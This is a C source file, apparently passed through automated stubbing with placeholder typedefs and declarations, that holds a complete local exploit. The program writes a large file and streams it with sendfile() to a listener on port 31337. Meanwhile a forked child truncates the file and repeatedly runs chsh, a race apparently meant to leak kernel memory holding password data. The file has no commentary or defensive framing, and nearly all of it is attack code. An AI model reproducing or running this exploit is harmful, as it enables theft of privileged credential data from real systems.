
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct stat {int dummy; } ;
struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {int sin_family; int sin_port; TYPE_1__ sin_addr; } ;
struct sockaddr {int dummy; } ;
typedef int off_t ;
typedef int addr ;
typedef int FILE ;


 int AF_INET ;
 int INADDR_ANY ;
 int O_RDWR ;
 int PF_INET ;
 int SOCK_STREAM ;
 int connect (int,struct sockaddr*,int) ;
 int dolisten () ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 scalar_t__ fork () ;
 int fstat (int,struct stat*) ;
 int fwrite (char*,int,int,int *) ;
 int htons (int) ;
 int open (char*,int ) ;
 int perror (char*) ;
 int sendfile (int,int,int ,int,int *,int *,int ) ;
 int sleep (int) ;
 int socket (int ,int ,int ) ;
 int system (char*) ;
 int wait () ;

int main() {
       int input_fd,fd,s,k;
       struct stat file_info;
       off_t offset = 0;
               FILE *f;
       int i=0;
       struct sockaddr_in addr;
               char st[]="A";

               f=fopen("sendfile1", "w");
               for (i=0; i!=64000000; i++) {
                       fwrite(st, 1, 1, f);
               }
               fclose(f);

       input_fd = open ("sendfile1", O_RDWR);
       fstat (input_fd, &file_info);

       if (fork() != 0) {
       sleep(2);
               s = socket(PF_INET, SOCK_STREAM, 0);

               addr.sin_addr.s_addr = INADDR_ANY;
               addr.sin_port = htons(31337);
               addr.sin_family = AF_INET;

               if (connect(s, (struct sockaddr*) &addr, sizeof(addr)) == -1)
               {
                       perror("connect() failed");
                       return 2;
               }

               if (fork() != 0) {
               if (sendfile (input_fd, s, offset, 64000000, ((void*)0), ((void*)0), 0) == -1) {
                       perror("sendfile()");
               return -1;
               }
               } else {
                       f=fopen("sendfile1", "w");
                       fclose(f);
                       for (k=0;k!=10;k++)
                               system("/usr/bin/chsh -s /bin/sh");
                       wait();
               }
               } else {
                       dolisten();
                       wait();
               }
       return 0;
}
